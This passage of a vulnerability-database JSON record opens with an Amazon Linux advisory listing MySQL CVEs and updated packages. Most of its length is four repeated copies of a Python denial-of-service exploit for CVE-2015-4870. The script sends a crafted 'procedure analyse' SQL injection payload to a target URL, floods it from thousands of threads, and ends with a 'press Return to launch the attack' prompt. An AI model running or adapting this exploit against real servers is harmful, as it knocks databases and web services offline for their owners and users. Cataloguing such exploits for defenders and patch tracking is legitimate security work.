authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0616 __](<https://access.redhat.com/security/cve/CVE-2016-0616>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached. ([CVE-2015-4910 __](<https://access.redhat.com/security/cve/CVE-2015-4910>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML, a different vulnerability than [CVE-2015-4858 __](<https://access.redhat.com/security/cve/CVE-2015-4858>). ([CVE-2015-4913 __](<https://access.redhat.com/security/cve/CVE-2015-4913>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. ([CVE-2016-0610 __](<https://access.redhat.com/security/cve/CVE-2016-0610>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.21 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0594 __](<https://access.redhat.com/security/cve/CVE-2016-0594>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0595 __](<https://access.redhat.com/security/cve/CVE-2016-0595>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0596 __](<https://access.redhat.com/security/cve/CVE-2016-0596>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0597 __](<https://access.redhat.com/security/cve/CVE-2016-0597>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0598 __](<https://access.redhat.com/security/cve/CVE-2016-0598>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than [CVE-2015-4802 __](<https://access.redhat.com/security/cve/CVE-2015-4802>). ([CVE-2015-4792 __](<https://access.redhat.com/security/cve/CVE-2015-4792>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges. ([CVE-2015-4791 __](<https://access.redhat.com/security/cve/CVE-2015-4791>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache. ([CVE-2015-4807 __](<https://access.redhat.com/security/cve/CVE-2015-4807>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser. ([CVE-2015-4870 __](<https://access.redhat.com/security/cve/CVE-2015-4870>))\n\nUnspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0599 __](<https://access.redhat.com/security/cve/CVE-2016-0599>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. ([CVE-2016-0546 __](<https://access.redhat.com/security/cve/CVE-2016-0546>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2015-4913 __](<https://access.redhat.com/security/cve/CVE-2015-4913>). ([CVE-2015-4858 __](<https://access.redhat.com/security/cve/CVE-2015-4858>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL. ([CVE-2015-4815 __](<https://access.redhat.com/security/cve/CVE-2015-4815>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition. ([CVE-2015-4833 __](<https://access.redhat.com/security/cve/CVE-2015-4833>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. ([CVE-2015-4830 __](<https://access.redhat.com/security/cve/CVE-2015-4830>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : SP. ([CVE-2015-4836 __](<https://access.redhat.com/security/cve/CVE-2015-4836>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to UDF. ([CVE-2016-0608 __](<https://access.redhat.com/security/cve/CVE-2016-0608>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to privileges. ([CVE-2016-0609 __](<https://access.redhat.com/security/cve/CVE-2016-0609>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Options. ([CVE-2016-0505 __](<https://access.redhat.com/security/cve/CVE-2016-0505>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2016-0503 __](<https://access.redhat.com/security/cve/CVE-2016-0503>). ([CVE-2016-0504 __](<https://access.redhat.com/security/cve/CVE-2016-0504>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Replication. ([CVE-2015-4890 __](<https://access.redhat.com/security/cve/CVE-2015-4890>))\n\nUnspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Partition. ([CVE-2016-0601 __](<https://access.redhat.com/security/cve/CVE-2016-0601>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to libmysqld. ([CVE-2015-4904 __](<https://access.redhat.com/security/cve/CVE-2015-4904>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML. ([CVE-2015-4905 __](<https://access.redhat.com/security/cve/CVE-2015-4905>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors. ([CVE-2016-0605 __](<https://access.redhat.com/security/cve/CVE-2016-0605>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect integrity via unknown vectors related to encryption. ([CVE-2016-0606 __](<https://access.redhat.com/security/cve/CVE-2016-0606>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect availability via unknown vectors related to Server : Security : Firewall. ([CVE-2015-4766 __](<https://access.redhat.com/security/cve/CVE-2015-4766>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0611 __](<https://access.redhat.com/security/cve/CVE-2016-0611>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to replication. ([CVE-2016-0607 __](<https://access.redhat.com/security/cve/CVE-2016-0607>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client programs. ([CVE-2015-4819 __](<https://access.redhat.com/security/cve/CVE-2015-4819>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to DML. ([CVE-2015-4879 __](<https://access.redhat.com/security/cve/CVE-2015-4879>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0502 __](<https://access.redhat.com/security/cve/CVE-2016-0502>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4895 __](<https://access.redhat.com/security/cve/CVE-2015-4895>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2016-0504 __](<https://access.redhat.com/security/cve/CVE-2016-0504>). ([CVE-2016-0503 __](<https://access.redhat.com/security/cve/CVE-2016-0503>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. ([CVE-2016-0600 __](<https://access.redhat.com/security/cve/CVE-2016-0600>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than [CVE-2015-4792 __](<https://access.redhat.com/security/cve/CVE-2015-4792>). ([CVE-2015-4802 __](<https://access.redhat.com/security/cve/CVE-2015-4802>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer. ([CVE-2015-4800 __](<https://access.redhat.com/security/cve/CVE-2015-4800>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types. ([CVE-2015-4826 __](<https://access.redhat.com/security/cve/CVE-2015-4826>)) \n\n\n \n**Affected Packages:** \n\n\nmysql56\n\n \n**Issue Correction:** \nRun _yum update mysql56_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n mysql56-debuginfo-5.6.29-1.14.amzn1.i686 \n mysql56-common-5.6.29-1.14.amzn1.i686 \n mysql56-test-5.6.29-1.14.amzn1.i686 \n mysql56-errmsg-5.6.29-1.14.amzn1.i686 \n mysql56-server-5.6.29-1.14.amzn1.i686 \n mysql56-devel-5.6.29-1.14.amzn1.i686 \n mysql56-5.6.29-1.14.amzn1.i686 \n mysql56-libs-5.6.29-1.14.amzn1.i686 \n mysql56-bench-5.6.29-1.14.amzn1.i686 \n mysql56-embedded-devel-5.6.29-1.14.amzn1.i686 \n mysql56-embedded-5.6.29-1.14.amzn1.i686 \n \n src: \n mysql56-5.6.29-1.14.amzn1.src \n \n x86_64: \n mysql56-test-5.6.29-1.14.amzn1.x86_64 \n mysql56-bench-5.6.29-1.14.amzn1.x86_64 \n mysql56-server-5.6.29-1.14.amzn1.x86_64 \n mysql56-5.6.29-1.14.amzn1.x86_64 \n mysql56-devel-5.6.29-1.14.amzn1.x86_64 \n mysql56-errmsg-5.6.29-1.14.amzn1.x86_64 \n mysql56-embedded-5.6.29-1.14.amzn1.x86_64 \n mysql56-debuginfo-5.6.29-1.14.amzn1.x86_64 \n mysql56-libs-5.6.29-1.14.amzn1.x86_64 \n mysql56-common-5.6.29-1.14.amzn1.x86_64 \n mysql56-embedded-devel-5.6.29-1.14.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-04-06T14:40:00", "published": "2016-04-06T14:40:00", "id": "ALAS-2016-684", "href": "https://alas.aws.amazon.com/ALAS-2016-684.html", "title": "Important: mysql56", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL 5.5.45 - procedure analyse Function Denial of Service", "edition": 1, "published": "2016-05-30T00:00:00", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "id": "EXPLOITPACK:4856CE5DA621AD64273C51D5420971CA", "href": "", "sourceData": "#!/usr/bin/env python\n\n# Title: MySQL Procedure Analyse DoS Exploit\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\n# E-Mail: osanda[cat]unseen.is\n# Version: Vulnerable upto MySQL 5.5.45\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\n# This exploit is compatible with both Python 3.x and 2.x\n# CVE: CVE-2015-4870\n\nfrom __future__ import print_function\nimport threading\nimport time\nimport sys\nimport os\n\ntry: \n\timport urllib.request as urllib2\n\timport urllib.parse as urllib\n\nexcept ImportError:\n\timport urllib2\n\timport urllib\n\ntry: input = raw_input\nexcept NameError: pass\n\nhost = \"http://host/xxx.php?id=1'\"\n\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\n\npayload = urllib.quote(payload)\nurl = host + payload\nreq = urllib2.Request(url)\nreq.add_header('Accept', '*/*')\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\nreq.add_header('Connection', '')\nreq.add_header('Content-type', 'text/xml')\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\n\nclass DoS(threading.Thread):\n\tdef run(self):\n\t\tprint(\"{0} started!\".format(self.getName()))\n\t\tfor i in range(100): \n\t\t\turllib2.urlopen(req)\n\n\t\ttime.sleep(.2) \n\t\tprint(\"{0} finished!\".format(self.getName())) \n\ndef banner():\n\tprint (''' \n ____ _____ __ \n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \n /\\\\___/ \n \\\\/__/ \n\t\t ____ ____ \n\t\t/\\\\ _`\\\\ /\\\\ _`\\\\ \n\t\t\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \n\t\t \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \n\t\t \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \n\t\t \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\n\t\t \\\\/___/ \\\\/___/ \\\\/_____/\n \n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\n[*] E-Mail: osanda[cat]unseen.is\n[*] Website: http://osandamalith.wordpress.com \n[!] Author takes no responsibility of any damage you cause\n[!] Strictly for Educational purposes only \n''')\n\tprint(\"[*] Host: {0}\".format(host))\n\tinput(\"\\n\\t[-] Press Return to launch the attack\\n\")\n\ndef _start():\n\ttry:\n\t\tcls()\n\t\tbanner()\n\t\tfor i in range(10000): \n\t\t\tthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \n\t\t\tthread.start() \n\t\t\ttime.sleep(.1)\n\n\texcept KeyboardInterrupt:\n\t\tprint ('\\n[!] Ctrl + C detected\\n[!] Exiting')\n\t\tsys.exit(0)\n\t\t\n\texcept EOFError:\n\t\tprint ('\\n[!] Ctrl + D detected\\n[!] Exiting')\n\t\tsys.exit(0)\n\nif __name__ == '__main__':\n\t_start()", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-03-13T20:35:27", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-05-30T00:00:00", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "href": "https://0day.today/exploit/description/26031", "id": "1337DAY-ID-26031", "sourceData": "#!/usr/bin/env python\r\n \r\n# Title: MySQL Procedure Analyse DoS Exploit\r\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# E-Mail: osanda[cat]unseen.is\r\n# Version: Vulnerable upto MySQL 5.5.45\r\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\r\n# This exploit is compatible with both Python 3.x and 2.x\r\n# CVE: CVE-2015-4870\r\n \r\nfrom __future__ import print_function\r\nimport threading\r\nimport time\r\nimport sys\r\nimport os\r\n \r\ntry: \r\n import urllib.request as urllib2\r\n import urllib.parse as urllib\r\n \r\nexcept ImportError:\r\n import urllib2\r\n import urllib\r\n \r\ntry: input = raw_input\r\nexcept NameError: pass\r\n \r\nhost = \"http://host/xxx.php?id=1'\"\r\n \r\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\r\n \r\npayload = urllib.quote(payload)\r\nurl = host + payload\r\nreq = urllib2.Request(url)\r\nreq.add_header('Accept', '*/*')\r\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\r\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\r\nreq.add_header('Connection', '')\r\nreq.add_header('Content-type', 'text/xml')\r\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\r\n \r\nclass DoS(threading.Thread):\r\n def run(self):\r\n print(\"{0} started!\".format(self.getName()))\r\n for i in range(100): \r\n urllib2.urlopen(req)\r\n \r\n time.sleep(.2) \r\n print(\"{0} finished!\".format(self.getName())) \r\n \r\ndef banner():\r\n print (''' \r\n ____ _____ __ \r\n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \r\n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \r\n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \r\n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\r\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\r\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \r\n /\\\\___/ \r\n \\\\/__/ \r\n ____ ____ \r\n /\\\\ _`\\\\ /\\\\ _`\\\\ \r\n \\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \r\n \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \r\n \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \r\n \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\r\n \\\\/___/ \\\\/___/ \\\\/_____/\r\n \r\n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n[*] E-Mail: osanda[cat]unseen.is\r\n[*] Website: http://osandamalith.wordpress.com \r\n[!] Author takes no responsibility of any damage you cause\r\n[!] Strictly for Educational purposes only \r\n''')\r\n print(\"[*] Host: {0}\".format(host))\r\n input(\"\\n\\t[-] Press Return to launch the attack\\n\")\r\n \r\ndef _start():\r\n try:\r\n cls()\r\n banner()\r\n for i in range(10000): \r\n thread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \r\n thread.start() \r\n time.sleep(.1)\r\n \r\n except KeyboardInterrupt:\r\n print ('\\n[!] Ctrl + C detected\\n[!] Exiting')\r\n sys.exit(0)\r\n \r\n except EOFError:\r\n print ('\\n[!] Ctrl + D detected\\n[!] Exiting')\r\n sys.exit(0)\r\n \r\nif __name__ == '__main__':\r\n _start()\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26031"}], "exploitdb": [{"lastseen": "2016-05-30T21:10:56", "description": "MySQL 5.5.45 - procedure analyse Function Denial of Service. CVE-2015-4870. Dos exploits for multiple platform", "published": "2016-05-30T00:00:00", "type": "exploitdb", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "id": "EDB-ID:39867", "href": "https://www.exploit-db.com/exploits/39867/", "sourceData": "#!/usr/bin/env python\r\n\r\n# Title: MySQL Procedure Analyse DoS Exploit\r\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# E-Mail: osanda[cat]unseen.is\r\n# Version: Vulnerable upto MySQL 5.5.45\r\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\r\n# This exploit is compatible with both Python 3.x and 2.x\r\n# CVE: CVE-2015-4870\r\n\r\nfrom __future__ import print_function\r\nimport threading\r\nimport time\r\nimport sys\r\nimport os\r\n\r\ntry: \r\n\timport urllib.request as urllib2\r\n\timport urllib.parse as urllib\r\n\r\nexcept ImportError:\r\n\timport urllib2\r\n\timport urllib\r\n\r\ntry: input = raw_input\r\nexcept NameError: pass\r\n\r\nhost = \"http://host/xxx.php?id=1'\"\r\n\r\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\r\n\r\npayload = urllib.quote(payload)\r\nurl = host + payload\r\nreq = urllib2.Request(url)\r\nreq.add_header('Accept', '*/*')\r\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\r\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\r\nreq.add_header('Connection', '')\r\nreq.add_header('Content-type', 'text/xml')\r\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\r\n\r\nclass DoS(threading.Thread):\r\n\tdef run(self):\r\n\t\tprint(\"{0} started!\".format(self.getName()))\r\n\t\tfor i in range(100): \r\n\t\t\turllib2.urlopen(req)\r\n\r\n\t\ttime.sleep(.2) \r\n\t\tprint(\"{0} finished!\".format(self.getName())) \r\n\r\ndef banner():\r\n\tprint (''' \r\n ____ _____ __ \r\n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \r\n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \r\n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \r\n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\r\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\r\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \r\n /\\\\___/ \r\n \\\\/__/ \r\n\t\t ____ ____ \r\n\t\t/\\\\ _`\\\\ /\\\\ _`\\\\ \r\n\t\t\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \r\n\t\t \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \r\n\t\t \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \r\n\t\t \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\r\n\t\t \\\\/___/ \\\\/___/ \\\\/_____/\r\n \r\n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n[*] E-Mail: osanda[cat]unseen.is\r\n[*] Website: http://osandamalith.wordpress.com \r\n[!] Author takes no responsibility of any damage you cause\r\n[!] Strictly for Educational purposes only \r\n''')\r\n\tprint(\"[*] Host: {0}\".format(host))\r\n\tinput(\"\\n\\t[-] Press Return to launch the attack\\n\")\r\n\r\ndef _start():\r\n\ttry:\r\n\t\tcls()\r\n\t\tbanner()\r\n\t\tfor i in range(10000): \r\n\t\t\tthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \r\n\t\t\tthread.start() \r\n\t\t\ttime.sleep(.1)\r\n\r\n\texcept KeyboardInterrupt:\r\n\t\tprint ('\\n[!] Ctrl + C detected\\n[!] Exiting')\r\n\t\tsys.exit(0)\r\n\t\t\r\n\texcept EOFError:\r\n\t\tprint ('\\n[!] Ctrl + D detected\\n[!] Exiting')\r\n\t\tsys.exit(0)\r\n\r\nif __name__ == '__main__':\r\n\t_start()\r\n \r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39867/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:58", "description": "", "published": "2016-05-28T00:00:00", "type": "packetstorm", "title": "MySQL Procedure Analyse Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-28T00:00:00", "id": "PACKETSTORM:137232", "href": "https://packetstormsecurity.com/files/137232/MySQL-Procedure-Analyse-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/env python \n \n# Title: MySQL Procedure Analyse DoS Exploit \n# Author: Osanda Malith Jayathissa (@OsandaMalith) \n# E-Mail: osanda[cat]unseen.is \n# Version: Vulnerable upto MySQL 5.5.45 \n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/ \n# This exploit is compatible with both Python 3.x and 2.x \n# CVE: CVE-2015-4870 \n \nfrom __future__ import print_function \nimport threading \nimport time \nimport sys \nimport os \n \ntry: \nimport urllib.request as urllib2 \nimport urllib.parse as urllib \n \nexcept ImportError: \nimport urllib2 \nimport urllib \n \ntry: input = raw_input \nexcept NameError: pass \n \nhost = \"http://host/xxx.php?id=1'\" \n \npayload = \" procedure analyse((select*from(select 1)x),1)-- -\" \n \npayload = urllib.quote(payload) \nurl = host + payload \nreq = urllib2.Request(url) \nreq.add_header('Accept', '*/*') \nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0') \n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455') \nreq.add_header('Connection', '') \nreq.add_header('Content-type', 'text/xml') \ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear') \n \nclass DoS(threading.Thread): \ndef run(self): \nprint(\"{0} started!\".format(self.getName())) \nfor i in range(100): \nurllib2.urlopen(req) \n \ntime.sleep(.2) \nprint(\"{0} finished!\".format(self.getName())) \n \ndef banner(): \nprint (''' \n____ _____ __ \n/'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \n\\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\ \n\\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/ \n\\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \n/\\\\___/ \n\\\\/__/ \n____ ____ \n/\\\\ _`\\\\ /\\\\ _`\\\\ \n\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \n\\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \n\\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \n\\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\ \n\\\\/___/ \\\\/___/ \\\\/_____/ \n \n[*] Author: Osanda Malith Jayathissa (@OsandaMalith) \n[*] E-Mail: osanda[cat]unseen.is \n[*] Website: http://osandamalith.wordpress.com \n[!] Author takes no responsibility of any damage you cause \n[!] Strictly for Educational purposes only \n''') \nprint(\"[*] Host: {0}\".format(host)) \ninput(\"\\n\\t[-] Press Return to launch the attack\\n\") \n \ndef _start(): \ntry: \ncls() \nbanner() \nfor i in range(10000): \nthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \nthread.start() \ntime.sleep(.1) \n \nexcept KeyboardInterrupt: \nprint ('\\n[!] Ctrl + C detected\\n[!] Exiting') \nsys.exit(0) \n \nexcept EOFError: \nprint ('\\n[!] Ctrl + D detected\\n[!] Exiting') \nsys.exit(0) \n \nif __name__ == '__main__': \n_start() 